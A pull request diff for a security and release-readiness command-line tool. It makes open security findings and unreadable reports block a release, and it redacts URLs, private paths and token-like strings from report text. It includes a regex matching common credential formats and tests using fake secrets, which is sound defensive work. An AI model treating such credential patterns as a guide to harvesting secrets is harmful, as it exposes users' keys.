### PR TITLE
fix(release): report security findings as blockers

### DIFF
--- a/src/brigade/release_cmd/evidence.py
+++ b/src/brigade/release_cmd/evidence.py
@@ -543,10 +543,13 @@ def _assess(
         item for item in security_checks if item.get("name") != "security_open_findings" and item.get("status") != OK
     ]
     top_finding = security.get("top_finding") if isinstance(security.get("top_finding"), dict) else None
-    open_finding_count = int(security.get("open_finding_count") or 0)
-    if open_finding_count <= 0 and (open_finding_checks or top_finding is not None):
-        open_finding_count = 1
-    if open_finding_count > 0 or open_finding_checks or top_finding is not None:
+    reported_open_finding_count = security.get("open_finding_count")
+    open_finding_count = (
+        reported_open_finding_count
+        if isinstance(reported_open_finding_count, int) and not isinstance(reported_open_finding_count, bool)
+        else None
+    )
+    if (open_finding_count is not None and open_finding_count > 0) or open_finding_checks or top_finding is not None:
         if top_finding is not None:
             severity = str(top_finding.get("severity") or "unknown")
             category = str(top_finding.get("category") or "security")

--- a/src/brigade/release_cmd/evidence.py
+++ b/src/brigade/release_cmd/evidence.py
@@ -551,16 +551,23 @@ def _assess(
     )
     if (open_finding_count is not None and open_finding_count > 0) or open_finding_checks or top_finding is not None:
         if top_finding is not None:
-            severity = str(top_finding.get("severity") or "unknown")
-            category = str(top_finding.get("category") or "security")
-            finding_id = str(top_finding.get("id") or "unknown")
-            title = str(top_finding.get("title") or "open security finding")
+            severity = _release_report_safe_text(top_finding.get("severity"), fallback="unknown", limit=32)
+            category = _release_report_safe_text(top_finding.get("category"), fallback="security", limit=48)
+            finding_id = _release_report_safe_text(top_finding.get("id"), fallback="unknown", limit=120)
+            title = _release_report_safe_text(top_finding.get("title"), fallback="open security finding", limit=180)
             path = top_finding.get("path")
             line = top_finding.get("line")
-            location = f" at {path}:{line}" if path is not None else ""
-            remediation = str(top_finding.get("remediation_hint") or "").strip() or (
-                _check_remediation_text(open_finding_checks[0]) if open_finding_checks else "brigade security findings"
-            )
+            safe_path = _release_report_safe_text(path, limit=160) if path is not None else ""
+            safe_line = _release_report_safe_text(line, limit=32) if line is not None else ""
+            location = f" at {safe_path}:{safe_line}" if safe_path else ""
+            remediation = _release_report_safe_text(top_finding.get("remediation_hint"), limit=220)
+            if not remediation:
+                remediation = _release_report_safe_text(
+                    _check_remediation_text(open_finding_checks[0])
+                    if open_finding_checks
+                    else "brigade security findings",
+                    limit=220,
+                )
             blockers.append(
                 f"security_open_findings [{severity}/{category}]: {finding_id} {title}{location}; "
                 f"remediation: {remediation}"

--- a/src/brigade/release_cmd/evidence.py
+++ b/src/brigade/release_cmd/evidence.py
@@ -535,8 +535,46 @@ def _assess(
     if int(sweep_review.get("issue_count") or 0) > 0:
         blockers.append(f"scanner sweep has unresolved issue(s): {sweep_review.get('issue_count')}")
     security = evidence.get("security") if isinstance(evidence.get("security"), dict) else {}
-    if int(security.get("issue_count") or 0) > 0:
-        blockers.append(f"security has open issue(s): {security.get('issue_count')}")
+    security_checks = [item for item in security.get("checks", []) if isinstance(item, dict)]
+    open_finding_checks = [
+        item for item in security_checks if item.get("name") == "security_open_findings" and item.get("status") != OK
+    ]
+    security_health_checks = [
+        item for item in security_checks if item.get("name") != "security_open_findings" and item.get("status") != OK
+    ]
+    top_finding = security.get("top_finding") if isinstance(security.get("top_finding"), dict) else None
+    open_finding_count = int(security.get("open_finding_count") or 0)
+    if open_finding_count <= 0 and (open_finding_checks or top_finding is not None):
+        open_finding_count = 1
+    if open_finding_count > 0 or open_finding_checks or top_finding is not None:
+        if top_finding is not None:
+            severity = str(top_finding.get("severity") or "unknown")
+            category = str(top_finding.get("category") or "security")
+            finding_id = str(top_finding.get("id") or "unknown")
+            title = str(top_finding.get("title") or "open security finding")
+            path = top_finding.get("path")
+            line = top_finding.get("line")
+            location = f" at {path}:{line}" if path is not None else ""
+            remediation = str(top_finding.get("remediation_hint") or "").strip() or (
+                _check_remediation_text(open_finding_checks[0]) if open_finding_checks else "brigade security findings"
+            )
+            blockers.append(
+                f"security_open_findings [{severity}/{category}]: {finding_id} {title}{location}; "
+                f"remediation: {remediation}"
+            )
+        elif open_finding_checks:
+            for check in open_finding_checks:
+                blockers.append(_format_readiness_check(check))
+        else:
+            blockers.append(
+                f"security_open_findings: {open_finding_count} open finding(s); remediation: brigade security findings"
+            )
+    for check in security_health_checks:
+        message = _format_readiness_check(check)
+        if check.get("status") == FAIL:
+            blockers.append(message)
+        else:
+            warnings.append(message)
     ci_platform = evidence.get("ci_platform") if isinstance(evidence.get("ci_platform"), dict) else {}
     if int(ci_platform.get("issue_count") or 0) > 0:
         top_ci = ci_platform.get("top_issue") if isinstance(ci_platform.get("top_issue"), dict) else {}
@@ -589,9 +627,9 @@ def _assess(
         )
     for check in checks:
         if check.get("status") == FAIL:
-            blockers.append(f"{check.get('name')}: {check.get('detail')}")
+            blockers.append(_format_readiness_check(check))
         elif check.get("status") == WARN:
-            warnings.append(f"{check.get('name')}: {check.get('detail')}")
+            warnings.append(_format_readiness_check(check))
     return blockers, warnings
 
 

--- a/src/brigade/release_cmd/paths.py
+++ b/src/brigade/release_cmd/paths.py
@@ -196,19 +196,13 @@ def _latest_closeout_json(root: Path) -> dict[str, Any] | None:
 def _security_summary(target: Path) -> dict[str, Any]:
     health = security_cmd.health(target)
     checks = [item for item in health.get("checks", []) if isinstance(item, dict)] if isinstance(health, dict) else []
-    open_finding_checks = [
-        item for item in checks if item.get("name") == "security_open_findings" and item.get("status") != OK
-    ]
     health_warning_checks = [
         item for item in checks if item.get("name") != "security_open_findings" and item.get("status") != OK
     ]
-    open_finding_count = health.get("open_finding_count")
-    if open_finding_count is None:
-        open_finding_count = 1 if (open_finding_checks or health.get("top_finding")) else 0
     return {
         "valid": health.get("valid"),
         "issue_count": health.get("issue_count"),
-        "open_finding_count": int(open_finding_count or 0),
+        "open_finding_count": health.get("open_finding_count"),
         "raw_open_finding_count": health.get("raw_open_finding_count"),
         "health_warning_count": len(health_warning_checks),
         "checks": checks,

--- a/src/brigade/release_cmd/paths.py
+++ b/src/brigade/release_cmd/paths.py
@@ -195,15 +195,63 @@ def _latest_closeout_json(root: Path) -> dict[str, Any] | None:
 
 def _security_summary(target: Path) -> dict[str, Any]:
     health = security_cmd.health(target)
+    checks = [item for item in health.get("checks", []) if isinstance(item, dict)] if isinstance(health, dict) else []
+    open_finding_checks = [
+        item for item in checks if item.get("name") == "security_open_findings" and item.get("status") != OK
+    ]
+    health_warning_checks = [
+        item for item in checks if item.get("name") != "security_open_findings" and item.get("status") != OK
+    ]
+    open_finding_count = health.get("open_finding_count")
+    if open_finding_count is None:
+        open_finding_count = 1 if (open_finding_checks or health.get("top_finding")) else 0
     return {
         "valid": health.get("valid"),
         "issue_count": health.get("issue_count"),
+        "open_finding_count": int(open_finding_count or 0),
+        "raw_open_finding_count": health.get("raw_open_finding_count"),
+        "health_warning_count": len(health_warning_checks),
+        "checks": checks,
         "top_issue": health.get("top_issue"),
         "top_finding": health.get("top_finding"),
         "evidence": health.get("evidence"),
         "template_privacy": health.get("template_privacy"),
         "latest_closeout": health.get("latest_closeout"),
     }
+
+
+def _check_remediation_text(check: dict[str, Any]) -> str:
+    for key in ("remediation", "suggested_next_command", "next_command"):
+        value = check.get(key)
+        if isinstance(value, str) and value.strip():
+            return value.strip()
+    name = str(check.get("name") or "")
+    defaults = {
+        "security_open_findings": "brigade security findings",
+        "security_harness_wiring": "brigade security doctor --json",
+        "security_stale_suppressions": "brigade security scan; review stale suppressions",
+        "security_suppression_reasons": "brigade security suppress --help",
+        "security_config": "brigade security init",
+        "security_evidence": "brigade security scan",
+        "security_template_privacy": "brigade security template-audit",
+        "security_suppressions": "brigade security doctor --json",
+        "security_suppressions_cache": "brigade security doctor --json",
+    }
+    if name in defaults:
+        return defaults[name]
+    if name.startswith("content_guard_"):
+        guard_name = name.removeprefix("content_guard_")
+        return f"brigade content-guard check --name {guard_name}"
+    return f"investigate {name}" if name else "investigate failing check"
+
+
+def _format_readiness_check(check: dict[str, Any]) -> str:
+    name = str(check.get("name") or "unnamed_check")
+    detail = str(check.get("detail") or "").strip()
+    remediation = _check_remediation_text(check)
+    if detail:
+        return f"{name}: {detail}; remediation: {remediation}"
+    return f"{name}; remediation: {remediation}"
 
 
 def _changed_files(target: Path, base_ref: str | None) -> list[str]:

--- a/src/brigade/release_cmd/paths.py
+++ b/src/brigade/release_cmd/paths.py
@@ -53,6 +53,13 @@ RELEASE_PRIVATE_VALUE_RE = re.compile(
 
 RELEASE_PRIVATE_PATH_RE = re.compile(r"(?<!`)/(?:home|Users|private|mnt|Volumes)/[^\s`)]+")
 
+RELEASE_REPORT_URL_RE = re.compile(r"(?i)https?://[^\s]+")
+
+RELEASE_REPORT_TOKEN_RE = re.compile(
+    r"(?i)\b(?:bearer\s+[A-Za-z0-9._~+/=-]{8,}|github_pat_[A-Za-z0-9_]{8,}|ghp_[A-Za-z0-9]{8,}|"
+    r"xox[baprs]-[A-Za-z0-9-]{8,}|sk-(?:live|test|proj)-[A-Za-z0-9_-]{8,}|AKIA[A-Z0-9]{12,})\b"
+)
+
 SCHEMA_MANIFEST_VERSION = 1
 
 INSTALL_SMOKE_STALE_HOURS = 168
@@ -193,11 +200,64 @@ def _latest_closeout_json(root: Path) -> dict[str, Any] | None:
     return None
 
 
+def _release_report_safe_text(value: object, *, fallback: str = "", limit: int = 180) -> str:
+    rendered = str(value if value is not None else fallback)
+    rendered = RELEASE_REPORT_URL_RE.sub("[redacted-url]", rendered)
+    rendered = RELEASE_REPORT_TOKEN_RE.sub("[redacted]", rendered)
+    rendered = RELEASE_PRIVATE_VALUE_RE.sub(lambda match: f"{match.group(1)}=[redacted]", rendered)
+    rendered = RELEASE_PRIVATE_PATH_RE.sub("[redacted-path]", rendered)
+    rendered = " ".join(rendered.split())
+    if len(rendered) <= limit:
+        return rendered
+    return rendered[: limit - 3].rstrip() + "..."
+
+
+def _release_safe_security_check(check: dict[str, Any]) -> dict[str, Any]:
+    safe: dict[str, Any] = {
+        "status": _release_report_safe_text(check.get("status"), fallback="unknown", limit=16),
+        "name": _release_report_safe_text(check.get("name"), fallback="unnamed_check", limit=80),
+        "detail": _release_report_safe_text(check.get("detail"), limit=240),
+    }
+    for key in ("remediation", "suggested_next_command", "next_command"):
+        if key in check:
+            safe[key] = _release_report_safe_text(check.get(key), limit=180)
+    return safe
+
+
+def _release_safe_top_finding(value: object) -> dict[str, Any] | None:
+    if not isinstance(value, dict):
+        return None
+    safe: dict[str, Any] = {}
+    limits = {
+        "id": 120,
+        "severity": 32,
+        "category": 48,
+        "title": 180,
+        "path": 160,
+    }
+    for key, limit in limits.items():
+        if key in value:
+            safe[key] = _release_report_safe_text(value.get(key), limit=limit)
+    line = value.get("line")
+    if isinstance(line, int) and not isinstance(line, bool):
+        safe["line"] = line
+    elif line is not None:
+        safe["line"] = _release_report_safe_text(line, limit=32)
+    remediation = value.get("remediation_hint") or value.get("suggestion")
+    if remediation is not None:
+        safe["remediation_hint"] = _release_report_safe_text(remediation, limit=220)
+    return safe
+
+
 def _security_summary(target: Path) -> dict[str, Any]:
     health = security_cmd.health(target)
-    checks = [item for item in health.get("checks", []) if isinstance(item, dict)] if isinstance(health, dict) else []
+    checks = (
+        [_release_safe_security_check(item) for item in health.get("checks", []) if isinstance(item, dict)]
+        if isinstance(health, dict)
+        else []
+    )
     health_warning_checks = [
-        item for item in checks if item.get("name") != "security_open_findings" and item.get("status") != OK
+        item for item in checks if item.get("name") != "security_open_findings" and item.get("status") == WARN
     ]
     return {
         "valid": health.get("valid"),
@@ -206,8 +266,10 @@ def _security_summary(target: Path) -> dict[str, Any]:
         "raw_open_finding_count": health.get("raw_open_finding_count"),
         "health_warning_count": len(health_warning_checks),
         "checks": checks,
-        "top_issue": health.get("top_issue"),
-        "top_finding": health.get("top_finding"),
+        "top_issue": _release_safe_security_check(health["top_issue"])
+        if isinstance(health.get("top_issue"), dict)
+        else None,
+        "top_finding": _release_safe_top_finding(health.get("top_finding")),
         "evidence": health.get("evidence"),
         "template_privacy": health.get("template_privacy"),
         "latest_closeout": health.get("latest_closeout"),
@@ -227,6 +289,7 @@ def _check_remediation_text(check: dict[str, Any]) -> str:
         "security_suppression_reasons": "brigade security suppress --help",
         "security_config": "brigade security init",
         "security_evidence": "brigade security scan",
+        "security_report": "brigade security scan",
         "security_template_privacy": "brigade security template-audit",
         "security_suppressions": "brigade security doctor --json",
         "security_suppressions_cache": "brigade security doctor --json",
@@ -240,9 +303,9 @@ def _check_remediation_text(check: dict[str, Any]) -> str:
 
 
 def _format_readiness_check(check: dict[str, Any]) -> str:
-    name = str(check.get("name") or "unnamed_check")
-    detail = str(check.get("detail") or "").strip()
-    remediation = _check_remediation_text(check)
+    name = _release_report_safe_text(check.get("name"), fallback="unnamed_check", limit=80)
+    detail = _release_report_safe_text(check.get("detail"), limit=240)
+    remediation = _release_report_safe_text(_check_remediation_text(check), limit=180)
     if detail:
         return f"{name}: {detail}; remediation: {remediation}"
     return f"{name}; remediation: {remediation}"

--- a/src/brigade/security_cmd/commands.py
+++ b/src/brigade/security_cmd/commands.py
@@ -112,7 +112,7 @@ def health(target: Path, *, suppression_cache_only: bool = False) -> dict[str, A
             }
         )
     else:
-        checks.append({"status": "warn", "name": "security_evidence", "detail": str(bundle.get("reason"))})
+        checks.append({"status": "fail", "name": "security_evidence", "detail": str(bundle.get("reason"))})
     template_audit_payload = template_privacy_payload(target)
     if template_audit_payload["finding_count"]:
         top_template = (
@@ -246,45 +246,48 @@ def health(target: Path, *, suppression_cache_only: bool = False) -> dict[str, A
     top_finding: dict[str, Any] | None = None
     raw_open_findings: list[dict[str, Any]] = []
     quieted_findings: list[dict[str, Any]] = []
+    open_finding_count: int | None = None
     if bundle.get("ready"):
         try:
             report = _load_report(default_artifacts_dir(target))
             raw_open_findings = [
                 item for item in _report_findings_for_review(target, report) if item.get("status") != "suppressed"
             ]
-        except (OSError, ValueError, json.JSONDecodeError):
-            raw_open_findings = []
-        quieted_findings = [
-            item
-            for item in raw_open_findings
-            if _finding_matches_fingerprints(item, accepted_fingerprints, migration_map=migration_map)
-        ]
-        if isinstance(latest_closeout, dict) and quieted_findings:
-            migrated_closeout = _migrate_closeout_fingerprints(latest_closeout, quieted_findings)
-            if migrated_closeout is not None:
-                latest_closeout = migrated_closeout
-                accepted_fingerprints = {
-                    str(fingerprint)
-                    for fingerprint in latest_closeout.get("source_fingerprints", [])
-                    if isinstance(fingerprint, str) and fingerprint
-                }
-                accepted_fingerprints = _expand_suppression_fingerprints(accepted_fingerprints, migration_map)
-        records = [
-            item
-            for item in raw_open_findings
-            if not _finding_matches_fingerprints(item, accepted_fingerprints, migration_map=migration_map)
-        ]
-        if records:
-            top_finding = records[0]
-            checks.append(
-                {
-                    "status": "warn",
-                    "name": "security_open_findings",
-                    "detail": f"{len(records)} open finding(s), top={top_finding.get('id')}",
-                }
-            )
+        except (OSError, TypeError, ValueError, json.JSONDecodeError) as exc:
+            checks.append({"status": "fail", "name": "security_report", "detail": f"unreadable or invalid: {exc}"})
         else:
-            checks.append({"status": "ok", "name": "security_open_findings", "detail": "none"})
+            quieted_findings = [
+                item
+                for item in raw_open_findings
+                if _finding_matches_fingerprints(item, accepted_fingerprints, migration_map=migration_map)
+            ]
+            if isinstance(latest_closeout, dict) and quieted_findings:
+                migrated_closeout = _migrate_closeout_fingerprints(latest_closeout, quieted_findings)
+                if migrated_closeout is not None:
+                    latest_closeout = migrated_closeout
+                    accepted_fingerprints = {
+                        str(fingerprint)
+                        for fingerprint in latest_closeout.get("source_fingerprints", [])
+                        if isinstance(fingerprint, str) and fingerprint
+                    }
+                    accepted_fingerprints = _expand_suppression_fingerprints(accepted_fingerprints, migration_map)
+            records = [
+                item
+                for item in raw_open_findings
+                if not _finding_matches_fingerprints(item, accepted_fingerprints, migration_map=migration_map)
+            ]
+            open_finding_count = len(records)
+            if records:
+                top_finding = records[0]
+                checks.append(
+                    {
+                        "status": "warn",
+                        "name": "security_open_findings",
+                        "detail": f"{open_finding_count} open finding(s), top={top_finding.get('id')}",
+                    }
+                )
+            else:
+                checks.append({"status": "ok", "name": "security_open_findings", "detail": "none"})
     issues = [item for item in checks if item["status"] != "ok"]
     return {
         "target": str(target),
@@ -298,6 +301,7 @@ def health(target: Path, *, suppression_cache_only: bool = False) -> dict[str, A
         "template_privacy": template_audit_payload,
         "harness_wiring": harness_wiring,
         "suppression_cache": suppression_cache,
+        "open_finding_count": open_finding_count,
         "raw_open_finding_count": len(raw_open_findings),
         "quieted_findings": quieted_findings,
         "quieted_finding_count": len(quieted_findings),

--- a/src/brigade/security_cmd/commands.py
+++ b/src/brigade/security_cmd/commands.py
@@ -253,8 +253,15 @@ def health(target: Path, *, suppression_cache_only: bool = False) -> dict[str, A
             raw_open_findings = [
                 item for item in _report_findings_for_review(target, report) if item.get("status") != "suppressed"
             ]
-        except (OSError, TypeError, ValueError, json.JSONDecodeError) as exc:
-            checks.append({"status": "fail", "name": "security_report", "detail": f"unreadable or invalid: {exc}"})
+        except (OSError, TypeError, ValueError, json.JSONDecodeError):
+            checks.append(
+                {
+                    "status": "fail",
+                    "name": "security_report",
+                    "detail": "unreadable or invalid security report",
+                    "remediation": "brigade security scan",
+                }
+            )
         else:
             quieted_findings = [
                 item

--- a/src/brigade/security_cmd/models.py
+++ b/src/brigade/security_cmd/models.py
@@ -328,6 +328,34 @@ HARNESS_WIRING_LOCKFILE_NAMES = frozenset(
 )
 
 
+def _should_skip_harness_wiring_path(path: Path, target: Path) -> bool:
+    """Exclude nested worktrees, Brigade work artifacts, and lockfiles from wiring scans only."""
+    try:
+        rel = path.relative_to(target)
+    except ValueError:
+        return True
+    if path.name in HARNESS_WIRING_LOCKFILE_NAMES:
+        return True
+    parts = rel.parts
+    if any(parts[index : index + 2] == (".brigade", "work") for index in range(len(parts) - 1)):
+        return True
+    for ancestor in path.parents:
+        if ancestor == target:
+            break
+        try:
+            ancestor.relative_to(target)
+        except ValueError:
+            break
+        git_marker = ancestor / ".git"
+        try:
+            marker_text = git_marker.read_text(encoding="utf-8", errors="replace") if git_marker.is_file() else ""
+        except OSError:
+            continue
+        if marker_text.strip().startswith("gitdir:"):
+            return True
+    return False
+
+
 HARNESS_PATH_KEYS = {
     "bootstrap_files",
     "cache_path",
@@ -573,13 +601,13 @@ def inspect_evidence_bundle(path: Path) -> dict[str, Any]:
     if missing:
         return {"ready": False, "path": str(path), "reason": f"missing {', '.join(missing)}"}
     try:
-        payload = json.loads(json_path.read_text())
-    except OSError as exc:
-        return {"ready": False, "path": str(path), "reason": f"unreadable security-report.json: {exc}"}
-    except UnicodeDecodeError as exc:
-        return {"ready": False, "path": str(path), "reason": f"security-report.json must be UTF-8: {exc}"}
-    except json.JSONDecodeError as exc:
-        return {"ready": False, "path": str(path), "reason": f"invalid JSON: {exc}"}
+        payload = json.loads(json_path.read_text(encoding="utf-8"))
+    except OSError:
+        return {"ready": False, "path": str(path), "reason": "unreadable security-report.json"}
+    except UnicodeDecodeError:
+        return {"ready": False, "path": str(path), "reason": "security-report.json must be UTF-8"}
+    except json.JSONDecodeError:
+        return {"ready": False, "path": str(path), "reason": "security-report.json is invalid JSON"}
     if not isinstance(payload, dict):
         return {"ready": False, "path": str(path), "reason": "security-report.json must contain an object"}
     findings = payload.get("findings")

--- a/src/brigade/security_cmd/models.py
+++ b/src/brigade/security_cmd/models.py
@@ -309,6 +309,25 @@ HARNESS_ROOTS = {
 }
 
 
+# Dependency lockfiles under harness roots (for example `.opencode/package-lock.json`)
+# are not harness wiring documents. Exclude them from harness-wiring scans only.
+HARNESS_WIRING_LOCKFILE_NAMES = frozenset(
+    {
+        "Cargo.lock",
+        "Gemfile.lock",
+        "Pipfile.lock",
+        "composer.lock",
+        "go.sum",
+        "npm-shrinkwrap.json",
+        "package-lock.json",
+        "pnpm-lock.yaml",
+        "poetry.lock",
+        "uv.lock",
+        "yarn.lock",
+    }
+)
+
+
 HARNESS_PATH_KEYS = {
     "bootstrap_files",
     "cache_path",

--- a/src/brigade/security_cmd/models.py
+++ b/src/brigade/security_cmd/models.py
@@ -574,10 +574,22 @@ def inspect_evidence_bundle(path: Path) -> dict[str, Any]:
         return {"ready": False, "path": str(path), "reason": f"missing {', '.join(missing)}"}
     try:
         payload = json.loads(json_path.read_text())
+    except OSError as exc:
+        return {"ready": False, "path": str(path), "reason": f"unreadable security-report.json: {exc}"}
+    except UnicodeDecodeError as exc:
+        return {"ready": False, "path": str(path), "reason": f"security-report.json must be UTF-8: {exc}"}
     except json.JSONDecodeError as exc:
         return {"ready": False, "path": str(path), "reason": f"invalid JSON: {exc}"}
     if not isinstance(payload, dict):
         return {"ready": False, "path": str(path), "reason": "security-report.json must contain an object"}
+    findings = payload.get("findings")
+    if not isinstance(findings, list):
+        return {"ready": False, "path": str(path), "reason": "security-report.json findings must be a list"}
+    suppressed_findings = payload.get("suppressed_findings", [])
+    if not isinstance(suppressed_findings, list):
+        return {"ready": False, "path": str(path), "reason": "security-report.json suppressed_findings must be a list"}
+    if any(not isinstance(item, dict) for item in [*findings, *suppressed_findings]):
+        return {"ready": False, "path": str(path), "reason": "security-report.json findings must contain objects"}
     return {
         "ready": True,
         "path": str(path),

--- a/src/brigade/security_cmd/reports.py
+++ b/src/brigade/security_cmd/reports.py
@@ -36,7 +36,10 @@ def _load_report_file(path: Path) -> dict[str, Any]:
     path = path.expanduser().resolve()
     if not path.is_file():
         raise FileNotFoundError(path)
-    data = json.loads(path.read_text())
+    try:
+        data = json.loads(path.read_text(encoding="utf-8"))
+    except UnicodeDecodeError as exc:
+        raise ValueError(f"security report must be UTF-8: {path}") from exc
     if not isinstance(data, dict):
         raise ValueError(f"security report must be a JSON object: {path}")
     return data

--- a/src/brigade/security_cmd/scan_engine.py
+++ b/src/brigade/security_cmd/scan_engine.py
@@ -16,10 +16,9 @@ from urllib import error as urlerror
 from urllib import request as urlrequest
 from urllib.parse import urlparse
 
-from .. import work_cmd
+from .. import localio, work_cmd
 from ..selection import WRITER_INBOXES
 from ..untrusted import PROMPT_INJECTION_RE, scan_untrusted
-from .. import localio
 from ..localio import read_json_dict as _read_json, utc_now_iso_z as _utc_iso, write_json as _write_json
 
 from . import models as _family_base
@@ -212,13 +211,14 @@ def _is_harness_wiring_document(path: Path, target: Path) -> bool:
         return False
     if parts and parts[0] == ".brigade":
         return path.name == "handoff-sources.json" or (len(parts) >= 2 and parts[1] in {"hermes", "openclaw"})
-    if parts and parts[0] in HARNESS_ROOTS:
-        return True
-    if len(parts) >= 4 and parts[0] == "src" and parts[1] == "brigade" and parts[2] == "templates":
-        return True
-    if parts and parts[0] == "templates":
-        return True
-    return False
+    return bool(
+        parts
+        and (
+            parts[0] in HARNESS_ROOTS
+            or parts[0] == "templates"
+            or (len(parts) >= 4 and parts[:3] == ("src", "brigade", "templates"))
+        )
+    )
 
 
 def _scan_harness_wiring_document(

--- a/src/brigade/security_cmd/scan_engine.py
+++ b/src/brigade/security_cmd/scan_engine.py
@@ -1565,10 +1565,9 @@ def _scan_handoff_inboxes(
     """Screen pending handoff notes for injection signals.
 
     Handoff inboxes are excluded from the line scanner via SKIP_PREFIXES so
-    untrusted note content is not attributed to the repo author. This pass
-    reports the same content through the untrusted-context lens instead:
-    a pending note carrying injection-style instructions should be reviewed
-    before any ingester reads it. `processed/` and TEMPLATE.md are skipped.
+    untrusted note content is not attributed to the repo author. Injection-style
+    instructions are reported through the untrusted-context lens for review before
+    any ingester reads them. `processed/` and TEMPLATE.md are skipped.
     """
     scanned: list[str] = []
     for inbox_rel in sorted(set(WRITER_INBOXES.values())):
@@ -1644,7 +1643,8 @@ def scan_target(
                 classification=classification,
             )
         _scan_mcp_document(findings, target=target, path=path, text=text, classification=classification)
-        _scan_harness_wiring_document(findings, target=target, path=path, text=text, classification=classification)
+        if not _should_skip_harness_wiring_path(path, target):
+            _scan_harness_wiring_document(findings, target=target, path=path, text=text, classification=classification)
         _scan_package_json(findings, target=target, path=path, text=text, classification=classification)
         _scan_github_actions(findings, target=target, path=path, text=text, classification=classification)
         _scan_python_project(findings, target=target, path=path, text=text, classification=classification)

--- a/src/brigade/security_cmd/template_audit_ops.py
+++ b/src/brigade/security_cmd/template_audit_ops.py
@@ -76,33 +76,6 @@ def _contains_private_key_material(line: str) -> bool:
     return bool(PRIVATE_KEY_RE.search(line) and "REDACTED PRIVATE KEY" not in line)
 
 
-def _should_skip_harness_wiring_path(path: Path, target: Path) -> bool:
-    """Exclude nested worktrees, `.brigade/work` artifacts, and lockfiles from wiring scans only."""
-    try:
-        rel = path.relative_to(target)
-    except ValueError:
-        return True
-    if path.name in HARNESS_WIRING_LOCKFILE_NAMES:
-        return True
-    parts = rel.parts
-    if any(parts[index : index + 2] == (".brigade", "work") for index in range(len(parts) - 1)):
-        return True
-    for ancestor in path.parents:
-        if ancestor == target:
-            break
-        try:
-            ancestor.relative_to(target)
-        except ValueError:
-            break
-        git_marker = ancestor / ".git"
-        try:
-            if git_marker.is_file() and git_marker.read_text(errors="replace").strip().startswith("gitdir:"):
-                return True
-        except OSError:
-            continue
-    return False
-
-
 def _template_relpath(target: Path, path: Path) -> str:
     try:
         return str(path.relative_to(target))

--- a/src/brigade/security_cmd/template_audit_ops.py
+++ b/src/brigade/security_cmd/template_audit_ops.py
@@ -76,6 +76,33 @@ def _contains_private_key_material(line: str) -> bool:
     return bool(PRIVATE_KEY_RE.search(line) and "REDACTED PRIVATE KEY" not in line)
 
 
+def _should_skip_harness_wiring_path(path: Path, target: Path) -> bool:
+    """Exclude nested worktrees, `.brigade/work` artifacts, and lockfiles from wiring scans only."""
+    try:
+        rel = path.relative_to(target)
+    except ValueError:
+        return True
+    if path.name in HARNESS_WIRING_LOCKFILE_NAMES:
+        return True
+    parts = rel.parts
+    if any(parts[index : index + 2] == (".brigade", "work") for index in range(len(parts) - 1)):
+        return True
+    for ancestor in path.parents:
+        if ancestor == target:
+            break
+        try:
+            ancestor.relative_to(target)
+        except ValueError:
+            break
+        git_marker = ancestor / ".git"
+        try:
+            if git_marker.is_file() and git_marker.read_text(errors="replace").strip().startswith("gitdir:"):
+                return True
+        except OSError:
+            continue
+    return False
+
+
 def _template_relpath(target: Path, path: Path) -> str:
     try:
         return str(path.relative_to(target))
@@ -191,6 +218,8 @@ def harness_wiring_payload(target: Path) -> dict[str, Any]:
     findings: list[dict[str, Any]] = []
     scanned_files: list[str] = []
     for path in _iter_scan_files(target):
+        if _should_skip_harness_wiring_path(path, target):
+            continue
         if not _is_harness_wiring_document(path, target):
             continue
         try:

--- a/tests/test_doctor.py
+++ b/tests/test_doctor.py
@@ -356,6 +356,7 @@ def test_doctor_reports_security_config_and_evidence_bundle(tmp_target: Path, ca
             {
                 "generated_at": "2026-05-26T12:00:00Z",
                 "finding_count": 0,
+                "findings": [],
                 "policy": "personal",
             }
         )

--- a/tests/test_release_cmd.py
+++ b/tests/test_release_cmd.py
@@ -977,6 +977,92 @@ def test_release_readiness_distinguishes_security_findings_from_health_warnings(
     assert "brigade security scan; review stale suppressions" in warnings
 
 
+def test_release_readiness_redacts_and_bounds_report_controlled_top_finding(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    _patch_content_guard(monkeypatch)
+    marker = "SECURITY_REPORT_PRIVATE_MARKER"
+    private_url = "https://agent.private.invalid/report"
+    sensitive_value = "abcd" * 5
+    controlled = f"{marker}\n{private_url} report_token={sensitive_value} " + ("x" * 2_000)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": True,
+            "issue_count": 1,
+            "open_finding_count": 1,
+            "raw_open_finding_count": 1,
+            "top_issue": None,
+            "top_finding": {
+                "id": controlled,
+                "severity": controlled,
+                "category": controlled,
+                "title": controlled,
+                "path": controlled,
+                "line": controlled,
+                "remediation_hint": controlled,
+            },
+            "checks": [
+                {
+                    "status": "warn",
+                    "name": "security_open_findings",
+                    "detail": f"1 open finding(s), top={controlled}",
+                    "remediation": controlled,
+                }
+            ],
+            "evidence": {"ready": True, "finding_count": 1},
+        },
+    )
+
+    assert release_cmd.run(target=tmp_path, base_ref=None, json_output=True) == 1
+    payload = json.loads(capsys.readouterr().out)
+    serialized = json.dumps(payload)
+    blocker = next(item for item in payload["blockers"] if item.startswith("security_open_findings"))
+    receipt = json.loads(Path(payload["path"], "receipt.json").read_text(encoding="utf-8"))
+    serialized_receipt = json.dumps(receipt)
+
+    assert private_url not in serialized
+    assert sensitive_value not in serialized
+    assert private_url not in serialized_receipt
+    assert sensitive_value not in serialized_receipt
+    assert "\n" not in blocker
+    assert "[redacted-url]" in blocker
+    assert "[redacted]" in blocker
+    assert len(blocker) <= 1_000
+
+
+def test_release_security_health_warning_count_excludes_failures(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    _patch_content_guard(monkeypatch)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": False,
+            "issue_count": 3,
+            "open_finding_count": 0,
+            "raw_open_finding_count": 0,
+            "top_issue": None,
+            "top_finding": None,
+            "checks": [
+                {"status": "ok", "name": "security_open_findings", "detail": "none"},
+                {"status": "warn", "name": "security_harness_wiring", "detail": "warning"},
+                {"status": "fail", "name": "security_report", "detail": "invalid"},
+            ],
+            "evidence": {"ready": True, "finding_count": 0},
+        },
+    )
+
+    assert release_cmd.plan(target=tmp_path, base_ref=None, json_output=True) == 0
+    payload = json.loads(capsys.readouterr().out)
+
+    assert payload["evidence"]["security"]["health_warning_count"] == 1
+
+
 def test_release_readiness_blocks_unusable_security_evidence(tmp_path, monkeypatch, capsys):
